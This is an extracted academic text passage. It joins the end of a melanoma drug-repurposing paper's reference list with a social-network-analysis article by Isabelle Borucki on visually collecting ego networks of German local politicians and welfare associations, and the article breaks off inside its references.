T, Sahoo S, McGuinness D. 2013. PROV-O: the PROV ontology. Available at http://www.w3.org/TR/prov-o/. Lee M-Y, Kumar RA, Sukumaran SM, Hogg MG, Clark DS, Dordick JS. 2008. Three-dimensional cellular microarray for high-throughput toxicology assays. Proceedings of the National Academy of Sciences of the United States of America 105(1):59–63 DOI 10.1073/pnas.0708756105. Lemontt J, Azzaria M, Gros P. 1988. Increased mdr gene expression and decreased drug accumulation in multidrug-resistant human melanoma cells. Cancer Research 48(22):6348–6353. Loiselle FB, Morgan PE, Alvarez BV, Casey JR. 2004. Regulation of the human NBC3 Na + /HCO3 - cotransporter by carbonic anhydrase II and PKA. American Journal of Physiology-Cell Physiology 286(6):C1423–C1433 DOI 10.1152/ajpcell.00382.2003. Luikart S, Kennealey G, Kirkwood J. 1984. Randomized phase III trial of vinblastine, bleomycin, and cis-dichlorodiammine-platinum versus dacarbazine in malignant melanoma. Journal of Clinical Oncology 2(3):164–168. Lynn DJ, Winsor GL, Chan C, Richard N, Laird MR, Barsky A, Gardy JL, Roche FM, Chan THW, Shah N, Lo R, Naseer M, Que J, Yau M, Acab M, Tulpan D, Whiteside MD, Chikatamarla A, Mah B, Munzner T, Hokamp K, Hancock REW, Brinkman FSL. 2008. InnateDB: facilitating systems-level analyses of the mammalian innate immune response. Molecular Systems Biology 4(1):218 DOI 10.1038/msb.2008.55. Mansuy M, Nikkels-Tassoudji N, Arrese JE, Rorive A, Nikkels AF. 2014. Recurrent in situ melanoma successfully treated with ingenol mebutate. Dermatology and Therapy 4(1):131–135 DOI 10.1007/s13555-014-0051-4. Maraveyas A, Johnson MJ, Xiao YP, Noble S. 2010. Malignant melanoma as a target malignancy for the study of the anti-metastatic properties of the heparins. Cancer and Metastasis Reviews 29(4):777–784 DOI 10.1007/s10555-010-9263-y. McGuinness DL, Ding L, Silva PPD, Chang C. 2007. PML 2: a modular explanation interlingua. In: Proceedings of the AAAI 2007 Workshop on Explanation-Aware Computing, Vancouver, 22–23. Moller JT, Cluitmans P, Rasmussen LS, Houx P, Rasmussen H, Canet J, Rabbitt P, Jolles J, Larsen K, Hanning CD, Langeron O, Johnson T, Lauven PM, Kristensen PA, Biedler A, van Beem H, Fraidakis O, Silverstein JH, Beneken JEW, Gravenstein JS. 1998. Long-term McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 18/20 http://dx.doi.org/10.1038/nrd2519 http://dx.doi.org/10.3109/07357909709039732 http://dx.doi.org/10.1038/ng.3361 http://dx.doi.org/10.1126/science.1132939 http://dx.doi.org/10.1111/pcmr.12092 http://www.w3.org/TR/prov-o/ http://dx.doi.org/10.1073/pnas.0708756105 http://dx.doi.org/10.1152/ajpcell.00382.2003 http://dx.doi.org/10.1038/msb.2008.55 http://dx.doi.org/10.1007/s13555-014-0051-4 http://dx.doi.org/10.1007/s10555-010-9263-y http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ postoperative cognitive dysfunction in the elderly: ISPOCD1 study. Lancet 351(9106):857–861 DOI 10.1016/s0140-6736(97)07382-0. Motik B, Patel-Schneider PF, Cuenca Grau B. 2009. OWL 2 Web Ontology Language: Direct Semantics. Available at https://www.w3.org/TR/owl2-direct-semantics/. Nagy Z, Turcsik V, Blaskó G. 2009. The effect of LMWH (nadroparin) on tumor progression. Pathology & Oncology Research 15(4):689–692 DOI 10.1007/s12253-009-9204-7. Naing A. 2011. Phase I dose escalation study of sodium stibogluconate (SSG) a protein tyrosine phosphatase inhibitor, combined with interferon alpha for patients with solid tumors. Journal of Cancer 2:81–89 DOI 10.7150/jca.2.81. National Cancer Institute. 2005. Carboplatin and paclitaxel with or without sorafenib tosylate in treating patients with stage III or stage IV melanoma that cannot be removed by surgery. Available at https://clinicaltrials.gov/ct2/show/NCT00110019 (accessed 10 January 2016). Pagel P, Kovac S, Oesterheld M, Brauner B, Dunger-Kaltenbach I, Frishman G, Montrone C, Mark P, Stümpflen V, Mewes H-W, Ruepp A, Frishman D. 2005. The mips mammalian protein-protein interaction database. Bioinformatics 21(6):832–834 DOI 10.1093/bioinformatics/bti115. Pardo OE, Wellbrock C, Khanzada UK, Aubert M, Arozarena I, Davidson S, Bowen F, Parker PJ, Filonenko VV, Gout IT, Sebire N, Marais R, Downward J, Seckl MJ. 2006. FGF-2 protects small cell lung cancer cells from apoptosis through a complex involving PKCepsilon, B-Raf and S6K2. EMBO Journal 25(13):3078–3088 DOI 10.1038/sj.emboj.7601198. Patel K, Doudican NA, Schiff PB, Orlow SJ. 2011. Albendazole sensitizes cancer cells to ionizing radiation. Radiation Oncology 6(1):160 DOI 10.1186/1748-717x-6-160. Peng X, Wang F, Li L, Bum-Erdene K, Xu D, Wang B, Sinn AA, Pollok KE, Sandusky GE, Li L, Turchi JJ, Jalal SI, Meroueh SO. 2014. Exploring a structural protein–drug interactome for new therapeutics in lung cancer. Molecular BioSystems 10(3):581 DOI 10.1039/c3mb70503j. Razick S, Magklaras G, Donaldson IM. 2008. iRefIndex: a consolidated protein interaction database with provenance. BMC Bioinformatics 9(1):405 DOI 10.1186/1471-2105-9-405. Richard C, David W, Markus L. 2014. RDF 1.1 Concepts and Abstract Syntax. W3C Recommendation. Available at https://www.w3.org/TR/rdf11-concepts/. Ruepp A, Waegele B, Lechner M, Brauner B, Dunger-Kaltenbach I, Fobo G, Frishman G, Montrone C, Mewes H-W. 2010. Corum: the comprehensive resource of mammalian protein complexes—2009. Nucleic Acids Research 38(Suppl 1):D497–D501 DOI 10.1093/nar/gkp914. Sanseau P, Koehler J. 2011. Editorial: computational methods for drug repurposing. Briefings in Bioinformatics 12(4):301–302 DOI 10.1093/bib/bbr047. Sawada N, Kataoka K, Kondo K, Arimochi H, Fujino H, Takahashi Y, Miyoshi T, Kuwahara T, Monden Y, Ohnishi Y. 2004. Betulinic acid augments the inhibitory effects of vincristine on growth and lung metastasis of B16F10 melanoma cells in mice. British Journal of Cancer 90(8):1672–1678 DOI 10.1038/sj.bjc.6601746. Scott WA. 1955. Reliability of content analysis: the case of nominal scale coding. Public Opinion Quarterly 19(3):321–325 DOI 10.1086/266577. Shen M, Zhang Y, Saba N, Austin CP, Wiestner A, Auld DS. 2013. Identification of therapeutic candidates for chronic lymphocytic leukemia from a library of approved drugs. PLoS ONE 8(9):e75252 DOI 10.1371/journal.pone.0075252. Sirota M, Dudley JT, Kim J, Chiang AP, Morgan AA, Sweet-Cordero A, Sage J, Butte AJ. 2011. Discovery and preclinical validation of drug indications using compendia of public gene expression data. Science Translational Medicine 3(96):96ra77 DOI 10.1126/scitranslmed.3001318. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 19/20 http://dx.doi.org/10.1016/s0140-6736(97)07382-0 https://www.w3.org/TR/owl2-direct-semantics/ http://dx.doi.org/10.1007/s12253-009-9204-7 http://dx.doi.org/10.7150/jca.2.81 https://clinicaltrials.gov/ct2/show/NCT00110019 http://dx.doi.org/10.1093/bioinformatics/bti115 http://dx.doi.org/10.1038/sj.emboj.7601198 http://dx.doi.org/10.1186/1748-717x-6-160 http://dx.doi.org/10.1039/c3mb70503j http://dx.doi.org/10.1186/1471-2105-9-405 https://www.w3.org/TR/rdf11-concepts/ http://dx.doi.org/10.1093/nar/gkp914 http://dx.doi.org/10.1093/bib/bbr047 http://dx.doi.org/10.1038/sj.bjc.6601746 http://dx.doi.org/10.1086/266577 http://dx.doi.org/10.1371/journal.pone.0075252 http://dx.doi.org/10.1126/scitranslmed.3001318 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ Skrabanek L, Saini HK, Bader GD, Enright AJ. 2008. Computational prediction of protein- protein interactions. Molecular Biotechnology 38(1):1–17 DOI 10.1007/s12033-007-0069-2. Smalley KSM, Contractor R, Haass NK, Kulp AN, Atilla-Gokcumen GE, Williams DS, Bregman H, Flaherty KT, Soengas MS, Meggers E, Herlyn M. 2007. An organometallic protein kinase inhibitor pharmacologically activates p53 and induces apoptosis in human melanoma cells. Cancer Research 67(1):209–217 DOI 10.1158/0008-5472.can-06-1538. Sprinzak E, Sattath S, Margalit H. 2003. How reliable are experimental protein–protein interaction data? Journal of Molecular Biology 327(5):919–923 DOI 10.1016/s0022-2836(03)00239-0. Stark C, Breitkreutz B-J, Reguly T, Boucher L, Breitkreutz A, Tyers M. 2006. BioGRID: a general repository for interaction datasets. Nucleic Acids Research 34(Suppl 1):D535–D539 DOI 10.1093/nar/gkj109. Vogt I, Prinz J, Campillos M. 2014. Molecularly and clinically related drugs and diseases are enriched in phenotypically similar drug-disease pairs. Genome Medicine 6(7):52 DOI 10.1186/s13073-014-0052-z. Whitehead RP, Moon J, McCachren SS, Hersh EM, Samlowski WE, Beck JT, Tchekmedyian NS, Sondak VK. 2004. A Phase II trial of vinorelbine tartrate in patients with disseminated malignant melanoma and one prior systemic therapy. Cancer 100(8):1699–1704 DOI 10.1002/cncr.20183. Wilkinson M, Vandervalk B, McCarthy L. 2009. SADI Semantic Web Services–cause you can’t always GETwhat you want! In: 2009 IEEE Asia-Pacific Services Computing Conference (APSCC). Singapore: IEEE, 13–18. Wishart DS, Knox C, Guo AC, Shrivastava S, Hassanali M, Stothard P, Chang Z, Woolsey J. 2006. DrugBank: a comprehensive resource for in silico drug discovery and exploration. Nucleic Acids Research 34(Suppl 1):D668–D672 DOI 10.1093/nar/gkj067. Wu C, Gudivada RC, Aronow BJ, Jegga AG. 2013. Computational drug repositioning through heterogeneous network clustering. BMC Systems Biology 7(Suppl 5):S6 DOI 10.1186/1752-0509-7-s5-s6. Wu Z, Wang Y, Chen L. 2013. Network-based drug repositioning. Molecular BioSystems 9(6):1268–1281 DOI 10.1039/c3mb25382a. Xenarios I, Salwinski L, Duan XJ, Higney P, Kim S-M, Eisenberg D. 2002. DIP, the database of interacting proteins: a research tool for studying cellular networks of protein interactions. Nucleic Acids Research 30(1):303–305 DOI 10.1093/nar/30.1.303. Yang L, Agarwal P. 2011. Systematic drug repositioning based on clinical side-effects. PLoS ONE 6(12):e28025 DOI 10.1371/journal.pone.0028025. Ye H, Liu Q, Wei J. 2014. Construction of drug network based on side effects and its application for drug repositioning. PLoS ONE 9(2):e87864 DOI 10.1371/journal.pone.0087864. McCusker et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.106 20/20 http://dx.doi.org/10.1007/s12033-007-0069-2 http://dx.doi.org/10.1158/0008-5472.can-06-1538 http://dx.doi.org/10.1016/s0022-2836(03)00239-0 http://dx.doi.org/10.1093/nar/gkj109 http://dx.doi.org/10.1186/s13073-014-0052-z http://dx.doi.org/10.1002/cncr.20183 http://dx.doi.org/10.1093/nar/gkj067 http://dx.doi.org/10.1186/1752-0509-7-s5-s6 http://dx.doi.org/10.1039/c3mb25382a http://dx.doi.org/10.1093/nar/30.1.303 http://dx.doi.org/10.1371/journal.pone.0028025 http://dx.doi.org/10.1371/journal.pone.0087864 http://dx.doi.org/10.7717/peerj-cs.106 https://peerj.com/computer-science/ Finding melanoma drugs through a probabilistic knowledge graph Introduction Results Discussion Materials and Methods flink5 References work_s4duytxexra2nfgn56bylrtljy ---- Microsoft Word - Volume37_final insna.org | Issues 1&2 | Volume 37 | 45 A Visual Data Collection Method: German Local Parties and Associations Dr. Isabelle Borucki (Corresponding author) University of Trier Trier, Germany Abstract This research captures local networks of German political parties and welfare agencies in re- gards to poverty. The article explores whether there are differences in regards to homophily and brokerage between the two studied groups using a dataset of 33 egonetworks in two Ger- man cities. The computer assisted drawn networks were collected in an interactive participa- tive way together with the interviewed egonetworks. To achieve the theoretical aim of analys- ing homophily and brokerage between politicians and welfare workers, two hypotheses are examined, resting upon social capital theory. The hypotheses were quantified and explicated with different variables. The first hypothesis states that heterophile networks imply more so- cial capital, which referred to different measurements (size, density, homophily). This could be partially validated since the analysed networks of association representatives (n=12) were denser and slightly more heterophile than those of party representatives (n=21). Second, it was assumed that politicians, because of their function as elected representatives, would be more likely to take on an interface function within the communities than representatives of civil society institutions. Results based on calculated EI-indices, subgraphs and brokerage show that party representatives do indeed have larger networks, but these networks split into fewer subgraphs than association representatives’ networks. Author Isabelle Borucki currently is leading “DIPART. Digital Party Research” – a junior research group on digital party research, located at the NRW School of Governance, University of Duisburg-Essen. Before that she worked at the Department of Political Science, University of Trier. Isabelle does research in Political Organizations and Parties, Comparative Politics, and Information Technology/Digitalization and Politics. Acknowledgements This research was funded by the German Research Foundation (DFG) within the project “Po- litical Representation of Poverty by Political Parties in Germany” of the Collaborative Re- search Centre (CRC) 600 at Trier University, Germany. The author wishes to thank Dimitris Christopoulos for his recommendations and Markus Gamper, Linda Reschke and Peter Starke for their remarks on earlier versions of the paper. Connections A Visual Data Collection Method 46 | Volume 37 | Issues 1&2 | insna.org 1. Introduction Poverty and social exclusion are pressing social issues in advanced and industrial- ized countries, such as Germany. In Ger- many, these issues are becoming more vis- ible through a public discussion of the German social security reform program ‘Hartz IV’ or the poverty of children. For German local communities, the fields of poverty prevention and fighting against al- ready existing poverty structures pose a va- riety of challenges. Officially, local institu- tions are responsible for a majority of so- cial benefits and their distribution. The in- terplay between different political actors and actors from civil society requires net- working, cooperation and coming to agreements at various levels. It is exactly this process, and the accompanying rela- tions and connections, which make munic- ipal efforts to fight poverty in Germany an interesting field for political science; a field which has hardly been explored in terms of networking structures. This is surprising, because municipalities are es- pecially restricted in their actions and ca- pabilities and depend on the cooperation and involvement from the civil sector, which is a challenge specifically visible in the area of fighting poverty. The thematic aim of this paper is to capture the local network of political par- ties and welfare agencies regarding pov- erty, and to explore whether there are dif- ferences concerning homophily and bro- kerage between politicians and welfare workers. The research question is: How exactly are local political actors connected with organisations from civil society? The methodological goal is to show that social network analysis is well suited to statistically represent the relations be- tween local politicians and welfare agen- cies. Additionally, the findings demon- strate that visual data collection allows for a simultaneous validation of data through the participation of the subject group. As a result, it can be illustrated how a visual in- quiry through digital networking maps en- ables a collection of quantitative data that can then be evaluated (Gamper et al., 2012). Lastly, it will be assessed how use- ful the method of visually surveying quan- titative data can be for the research field of local politics. Here, the question is: which advantages and disadvantages emerged for participants during the survey because of structured and standardized digital network maps? 2. State of Research and Theoretical Framework Some studies exist that take a closer look at the state of the German local level and its existing structures of decision-making. However, social network analysis has not been significantly featured in these works (Heinze & Voelzkow, 1991; Helbling, Egli, & Matter, 2005; Fowler, 2006; Ohm, 2009; Werner, 1998). Instead, the intent of this research is to offer a comparative look at the structures of fighting poverty at a lo- cal level by analysing the networks be- tween local politicians, welfare agencies and domestic associations. One exception to achieve this is the work of Sören Peter- mann (2008). He has studied the political influence of local politicians in the context of a social capital model in major cities, medium-sized cities and counties (Peter- mann, 2008, p. 156). He wanted to show how the social capital (Burt, 1995; Cole- man, 1988) of established politicians in the municipality (mayor, county commission- er, parliamentary party leaders) affects their political influence within the local power structures. Here, he measured the centrality of the actors and their broker po- sition in egonetworks (Petermann, 2008, p. 153, 155). Moreover, he calculated regres- sion models to estimate the social capital of politicians within interaction networks and found out that finding consensus and bargaining in networks depend on politi- cians’ prestige in the cities (ibid., p. 171). In methodological concerns, he showed that local top politicians are highly con- nected within their community, but admits that his studied networks focused on strong ties and interactions within cities. Howev- A Visual Data Collection Method Connections insna.org | Issues 1&2 | Volume 37 | 47 er, no studies exist that explicitly focus on the field of poverty at the local level in Germany. The study introduced here is meant to, at least partially, fill this academ- ic void. This study draws from Bourdieu’s social capital theory (Bourdieu, 1986; Coleman 1988; Lin, Cook, & Burt, 2001), because social capital enables inclusion in social networks, and entering social rela- tionships based on access to material and immaterial resources and support from other people (Crossley et al. 2015, p. 26– 37). At this point, it is assumed that social capital can be an individual, as well as a collective good. In institutionalized rela- tionships, resources can be tapped, which can prove beneficial for the individual, as well as for the collective. Here, it is helpful to understand networks as fields, in which social capital is distributed and exchanged (Bourdieu, 1985). Because one group dis- tinguishes itself from its outside, the pre- sent article is based on the assumption that, according to reciprocal recognition and re- inforcement, similar and homogenous ac- tors are to be found in local networks (Bourdieu, 1986). Consequently, the study is based on the following premises: The in- terrelationship between local party activ- ists, city administration and welfare agency officials serves as the exchange and foster- ing of one’s social capital. Depending on how much social capital an ego can accu- mulate, meaning how many potential communicative relations it has, it is more likely to be able to articulate its interests and act inclusively at the political level. Another, more special, type of capital is in- formation, because it is passed on through weak ties (Granovetter, 1973) within, and between, networks. This research is guided by asking about the cooperation of political parties, welfare agencies and the administration: How are these networks structured? What kind of different or similar actors can be found in these networks, how many of them are there and what is their function? Two hypotheses serve as guidelines: First: If actors from different areas are represented in a network, heterophile networks would contain more social capi- tal. This is based on the assumption that welfare agencies and domestic associations represent poverty-stricken people, because of their institutional foundation, and are, therefore, potential contacts for politicians. Consequently, their networks should be bigger and presumably denser and more heterophilic. Networks can be considered homophilic if alteri (network contacts and nodes), which resemble the ego and its fea- tures, are placed in the areas where the people questioned are supposed to locate their contacts (Lin, Cook, & Burt, 2001; Pfenning & Pfenning, 1987, p. 72). These three characteristics of networks (size, density, and homophily) will be calculated individually in this case. Second: Due to their function and position as representatives of the people, officials of political parties have higher brokerage values than representatives of welfare and domestic agencies. A person, who is located in a defining interface of the network, is called a broker. Brokerage is comparatively operationalized via the number of subgraphs in each egonetwork (Burt, 1995). The more subgraphs that are in an egonetwork, the higher the ego bro- kerage value. 3. Methodology For this study, egonetworks were collected and analysed (Fischer et al., 1977; Well- man & Leighton, 1978; Crossley et al. 2015). Because egonetworks explain rela- tions between the ego and its alteri, they reflect the individual “bounded rationality” of actors. The qualitative approach to net- works that gained attention recently (Bel- lotti 2008; Hollstein 2011) proved to be the best way to access the discussed field of research. Benefitting from qualitative SNA, a mixed methods design was real- ized based on visual network maps with targets (Crossley et al. 2015, p. 60). In this case, the program VennMaker was used to collect data visually through network maps Connections A Visual Data Collection Method 48 | Volume 37 | Issues 1&2 | insna.org (Kahn & Antonucci, 1980). This software allows an immediate visualization of the participant’s network during the conversa- tion. Additionally, network structures can be immediately validated by repeated and clarified questions during the interview process. The emphasis, therefore, lies on the qualitative aspects of respondents’ networks. Complementary, or, depending on the question, primarily, quantitative da- ta can be calculated by standardizing and structuring the network maps prior to the interview, so that results can be compared. Overall, the use of VennMaker is a stand- ardized collection, in which alteri attrib- utes, for example importance, type of rela- tionship, etc., are visualized through the program and are quantitatively recorded and standardized. This visual collection method combines qualitative and quantita- tive approaches and integrates both (Hollstein 2014, p. 10–1). The elicitation for this research was embedded in “tradi- tional”, in-depth expert interviews (Bogner, Littig, & Menz, 2009). Regarding the sampling parties, welfare agencies and domestic associations at the local level in an East German city (Jena) and a city in West Germany (Trier) were chosen. Both cities are home to a university, are of similar size, are of a similar socio- economic structure, and have to tackle similar challenges in areas of deprivation, which is what makes them participants of the federal “Social City Program”. Accordingly, a systematic prob- ability method was chosen to approach representative position holders in the field: the chairmen or executive directors of as- sociations and charities were interviewed and their political counterparts, the party leaders, faction leaders, or the politicians who had social policies as their main fo- cus. By then using the snowball-approach (Babbie, 2013, p. 191), other central actors were included in the course of the process. The sample includes 36 egonetworks in to- tal. For Jena, the sample includes six asso- ciation representatives, 12 party represent- atives and one city administrator. For Trier, five association representatives are included, as well as nine party representa- tives and two city administrators. Alto- gether, 19 women and 17 men between 31 and 72 years were represented. For four networks, not all data is available, and for three networks, interview effects can be assumed, which were conducted by anoth- er interviewer. The networks of admin- istration officials were not included, be- cause they represent a functional group of only three egos, and thus too small for an intended mean value comparison. The egonetworks were established together with the respondents using the “free net- work drawing” function of VennMaker based on targets. For the networks, alteri were collected through a name generator, in order to functionally separate the field (Burt, 1997; Campbell & Lee, 1991). For this analysis, the question asked focused explicitly on relationships of professional information exchange: “Now I am curious about the people with whom you work to- gether in the field of fighting poverty. If you could give me a specific example, for instance, who do you contact or ask for help when you administer benefits?” The generator was connected to qualitative guiding questions of the expert interview with the intention to reveal rele- vant cooperation: Most of the time, partic- ipants named organisations important to them in the course of the qualitative expert interview. These organisations were noted, and the participant would be asked, with which individuals from these organisations she worked together with in the field of welfare. The named alteri were then drawn in VennMaker, together with the interview partner, in a visually-participatory manner. Afterwards, the name interpreters were queried, which generated standardized in- formation regarding the alteri and their re- lations to ego. The nature of the relation- ship between the ego and its alteri is col- lected through the interpreters, as well as alter-alter relationships. Interpreters, com- prised of several common measures, such as the duration of contact, frequency of contact and the type of contact, the im- portance of alteri for the ego (visualized as A Visual Data Collection Method Connections insna.org | Issues 1&2 | Volume 37 | 49 the size of alteri), function, party member- ship, age and gender, were used. Interpret- ers were operationalized as follows: con- tact frequency: 1 = very often (daily, week- ly), 2 = often (up to three months), 3 = sel- dom (once or twice a year); duration of contact: 1 = 1–2 years, 2 = 2–5 years, 3 = 5–10 years, 4 = 10–20 years, 5 = more than 20 years; type of contact (personal, via phone, via mail, email, cell phone). The visual collection and participa- tory positioning together with the partici- pants proved to be very beneficial for both sides. At no point in time did the partici- pants feel as if they were producing the type of quantitative data, which is usually the case with questionnaires when collect- ing network data. Plus, this collection pro- cedure is not as time consuming as the classic approach. This method is, therefore, especially interesting for smaller and more sensitive research fields, and leads to equally valid results. In the course of the processing of the digital network map, it became appar- ent that categorical variables, such as fre- quency of contact, age or duration of con- tact, can be collected very well through the additionally configurable ‘actors chart’ in VennMaker, which is comparable to a questionnaire, meaning these were not added visually, but via a catalogue of ques- tions that can be called upon in the pro- gram. Instead, the form and formalization of cooperation was represented through re- lations, and afterwards the drawings were complemented with this information to- gether with participants. Here, varying forms of relations were offered to depict multiplexity, from which the participant could select the most fitting for the present relationship in their perception (see Figure 1). Figure 1: Visualization example of the operational- ization Source: Collection, calculation and figure by the author To distinguish those multiplex rela- tionships, several forms for collaboration were drawn with one alter. More specifi- cally, these were the exchange of infor- mation and experiences (turquoise), ex- change or procurement of means (finan- cially and otherwise; blue), planning and implementation of concrete measures (pur- ple) and timely loose or sporadic (orange), as well as institutionalized and formalized cooperation (green). The alteris’ colours represent party membership in line with parties’ colours or non-partisanship (white). Via three concentric circles, the accessibility of alteri was classified from “very good” to “less good” (see Figure 2). The sectors, meaning the circle segments in different grey shades, illustrate the areas of the municipality: political parties, city administration, agencies, charities and as- sociations, businesses, unions, media. For the quantitative analysis, the collected re- sults were controlled and processed in Ex- cel through the export function of the pro- gram. Afterwards, the network parameters and measures for homophily and brokerage were calculated by using UCINET; here, the calculation of density was balanced with the one from VennMaker. As a third factor, apart from size and density, ho- mophily was calculated using the EI-index. This index carries out values from −1 to 1; Connections A Visual Data Collection Method 50 | Volume 37 | Issues 1&2 | insna.org 1 meaning heterophily and −1 standing for homophily: the lower the value, the more homophilic the network. In order to com- pare the networks amongst each other, in terms of their homophily, this research takes the indices of the entire network into account. Finally, the comparison of mean values was calculated with a parametric test in SPSS. 4. Empirical Findings When looking at the network size, politi- cians have a slightly bigger network than the association representatives. The larger the network, the lower the density (Borgat- ti & Everett, 1997). For both groups, dif- ferences could be found in density rather than in size. A comparison of the networks of party representatives regarding the EI- index reveals that the networks show the entire spectrum of EI. For the mean value, all networks are located in the homophile field of the index, yet the networks of party representatives are more heterophilic at −0.122 (SD = 0.588) than those of the as- sociation representatives at −0.245 (SD = 0.696) (see Table 1). Thus, politicians have more heterophilic networks in terms of lo- cating alteri in sectors. The mean values show that the association networks display less varied values than the ones of the poli- ticians. Therefore, politicians act as infor- mation intermediaries according to the second hypothesis, which stated politicians enjoy a kind of monopoly regarding the passing of information, which is operation- alized through the number of subgraphs. Table 1: Comparison of the mean value for size, density, EI-index and subgraphs Collection, calculation and figure by the author.15 Significance level at 0.05. The difference in the amount of subgraphs from 21.38 (parties) to 23 on average (as- sociations) indicates that association repre- sentatives seem to have the higher broker- age power, and hypothesis two is rejected. The t-test was only relevant for the density. Regarding the number of subgraphs and function, the mean value comparison was not significant (see Table 1). Since the dif- ference of the mean values for density is accidental by up to 20 per cent, a very low effect between density and function may 15 The purely star-networks (no. 9, 10, 31, 34, 37) were excluded here. exist. As a result, one can state that the networks of the association representatives contribute more to the inclusion of affected interests than those of the party representa- tives. Contrary to this, the politicians’ net- works seem more secluded, due to their slight homogenous constitution. 5. Conclusion The thematic aim of this contribution was to illustrate the network structure between local politicians and welfare associations in poverty politics. The networks of stud- ied egos were quantified and explicated with different variables (size, density, ho- mophily, and subgraphs). The first hypoth- esis could be partially validated, because the networks of association representatives were denser and slightly more heterophilic Function Size Density EI-index via sector affiliation Number of subgraphs party (n=21) mean 24.950 0.12870 −0.122520 21.380 SD 9.897 0.12527 0.588792 13.261 association (n=12) mean 23.670 0.25010 −0.245500 23.000 SD 12.272 0.38182 0.696312 13.423 total (n=33) mean 24.480 0.17280 −0.167240 21.970 SD 10.648 0.25187 0.622052 13.133 significance (n=26) t 0.599 0.08000 0.775000 0.489 squared eta (n=26) ŋ2 0.012 0.00400 0.001000 0.210 A Visual Data Collection Method Connections insna.org | Issues 1&2 | Volume 37 | 51 than those of party representatives. Re- garding the second hypothesis, results show that party representatives have larger networks, yet these networks split into fewer subgraphs than the networks of as- sociation representatives. In terms of methodology, the aim was to show how digital network maps fa- cilitate collecting and analysing quantita- tive data. For this, data collection with VennMaker has proven to be very effec- tive. Structures and the manifestations of relations with the associations, as well as alteri-characteristics were standardized; here, the scaling and classification of cate- gories was very time-consuming. The posi- tioning of the alteri could be singled out from VennMaker for the quantitative cal- culations presented here. Insofar, it was as- sured that the shown network structure was also depicted in the quantitative data set. Sketching the networks together with the interview partners allowed a direct captur- ing of the inherent thought processes of the participants during the conversation. While this may have led, in some cases, to very confusing network maps, the fact that par- ticipants could see their networks structur- ally visualized proved to be interesting and surprising to them. This also prevented boredom or frustration from emerging dur- ing the collection of alter-alter-relations (McCarty, Killworth, & Rennell, 2007). The joint sketching caused participants to become more interested in the inquiry, and it was possible to illustrate the structure of their professional networks for them. Such a combined approach is currently without equal because a simultaneous positioning of the alteri and validation of network structures on a visual network map is a clear advantage of the program, whereas the analysis for statistical calculations had to be done with other programs. Conse- quently, VennMaker had an interface func- tion for the quantitative part of the study. The collection and processing of data was enabled and highly facilitated, in particu- lar, because of the program. Compared to this, the processing and calculating of pa- rameters, especially the EI-index and the ttest, was elaborate and tedious in UCI- NET. The data collected and exported with VennMaker was further analysed, or man- ually edited in other programs. Here, SPSS was fitting for the hypotheses tests. Initial- ly, VennMaker caused the most problems in the beginning of the analysis compared to the other programs. This was mainly be- cause the software was first used as a be- taversion in the research project and later on in the 1.0-version. These two versions already differed greatly in their usage, es- pecially the statistics functions, which were needed for a smooth export and fur- ther analysis: they were in need of further development. For the collection of network data, VennMaker has proven successful in an interview setting. As a result, the meth- od of using digital network cards is well suited for the visual-participatory collec- tion of egonetworks together with partici- pants. The possibility of sketching the network and the following revision with the participants should be emphasized as a positive feature. By proceeding this way, the interpretations of the interview partner could be directly included and analysed quantitatively afterwards. Because of that, a distortion by the researcher can be mini- mized, and, almost in passing, quantitative data can be collected. It could, therefore, be demonstrated that visual collection in- struments are well suited to gather and evaluate quantitative data. References Babbie, E. R. (2013). The practice of social research (13th ed.). Belmont, CA: Wadsworth Cengage Learning. Bellotti, E. (2008). What are friends for?: Elective communities of single people. Social Networks, 30(4), 318–329. doi:10.1016/j.socnet.2008.07.001 Bogner, A., Littig, B., & Menz, W. (Eds.). (2009). Re- search methods series. Interviewing experts. Ba- singstoke [England], New York: Palgrave Macmil- lan. Borgatti, S. P., & Everett, M. G. (1997). Network analysis of 2-mode data. Social Networks, 19(3), 243–269. doi:10.1016/S0378-8733(96)00301-2 Bourdieu, P. (1985). The genesis of the concepts of habitus and field. Sociocriticism, 2(2), 11–24. Bourdieu, P. (1986). The forms of capital. In J. G. Richardson (Ed.), Handbook of theory and re- Connections A Visual Data Collection Method 52 | Volume 37 | Issues 1&2 | insna.org search for the sociology of education (pp. 241– 258). New York: Greenwood Press. Burt, R. S. (1995). Structural holes: The social struc- ture of competition (2nd ed.). Cambridge, Mass.: Harvard University Press. Burt, R. S. (1997). A note on social capital and net- work content. Social Networks, 19(4), 355–373. doi:10.1016/S0378-8733(97)00003-8 Campbell, K. E., & Lee, B. A. (1991). Name genera- tors in surveys of personal networks. Social Net- works, 13(3), 203–221. doi:10.1016/0378- 8733(91)90006-F Coleman, J. S. (1988). Social capital in the creation of human capital. The American Journal of Sociolo- gy, 94, 95–120. Crossley, N., Bellotti, E., Edwards, G., Everett, M. G., Koskinen, J. & Tranmer, M. (2015). Social net- work analysis for ego-nets. Los Angeles: SAGE. Fischer, C. S., Stueve, C., Jones, L. M., Jackson, R. M., Gerson, K., & Baldassare, M. (1977). Net- works and places: Social relations in the urban setting. New York: Free Press. Gamper, M., Schönhuth, M., & Kronenwett, M. (2012). Bringing qualitative and quantitative data together – Collecting and analyzing network data with the help of the software tool VennMaker. In H. Safar, M. Safar, & K. A. Mahdi (Eds.), Social Networking and Community Behavior Modeling: Qualitative and Quantitative Measures. Qualita- tive and quantitative measures. Hershey: Infor- mation Science Reference. Granovetter, M. S. (1973). The strength of weak ties. American Journal of Sociology, 78(4), 1360–1380. Heinze, R., & Voelzkow, H. (1991). Kommunalpolitik und Verbände: Inszenierter Korporatismus auf lokaler und regionaler Ebene? In H. Heinelt & H. Wollmann (Eds.), Stadtforschung aktuell: Vol. 31. Brennpunkt Stadt. Stadtpolitik und lokale Politikforschung in den 80er und 90er Jahren (pp. 187–206). Basel: Birkhäuser. Helbling, M., Egli, S., & Matter, S. (2005). Lokale Eliten und kommunale Politiknetzwerke - Einflussreiche Akteure in der Einbürgerungspolitik einer Schweizer Gemeinde. In U. Serdült (Ed.): Vol. Nr. 3. Zürcher Politik- & Evaluationsstudien, Anwendungen sozialer Netzwerkanalyse. Beiträge zur Tagung vom 14. und 15. Oktober 2004 (pp. 105–118). Zürich: Institut für Politikwissenschaft. Forschungsbereich Policy-Analyse und Evaluation. Hollstein, B. (2011). Qualitative Approaches. In P. J. 